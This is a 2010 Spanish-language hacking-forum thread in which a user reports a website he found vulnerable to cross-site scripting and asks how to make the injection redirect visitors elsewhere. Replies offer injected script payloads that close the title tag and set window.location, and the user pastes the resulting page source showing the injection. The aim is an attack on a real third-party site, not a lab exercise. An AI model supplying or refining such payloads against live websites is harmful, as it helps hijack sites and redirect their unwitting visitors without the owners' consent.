Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: kamikazeeee en 31 Octubre 2010, 06:03 am

Título: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 06:03 am

hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:

Código:

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

muestra el alert.

ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?

intenté con

Código:

 </TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT>

pero no va

Disculpas por la ignorancia, y gracias por la ayuda!

Título: Re: Ayuda con XSS
Publicado por: Shell Root en 31 Octubre 2010, 16:53 pm

Simon así es,

Código

</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 18:41 pm

Cita de: Shell Root en 31 Octubre 2010, 16:53 pm

Simon así es,

Código

</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Eso es lo que dije que ya probé, y no funcionó :/

Título: Re: Ayuda con XSS
Publicado por: xassiz~ en 31 Octubre 2010, 20:08 pm

Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo :P

Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 20:28 pm

El código queda así:

Código:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"

Título: Re: Ayuda con XSS
Publicado por: xassiz~ en 31 Octubre 2010, 21:37 pm

Prueba:

Código

</title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>

Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 1 Noviembre 2010, 00:19 am

no funcionó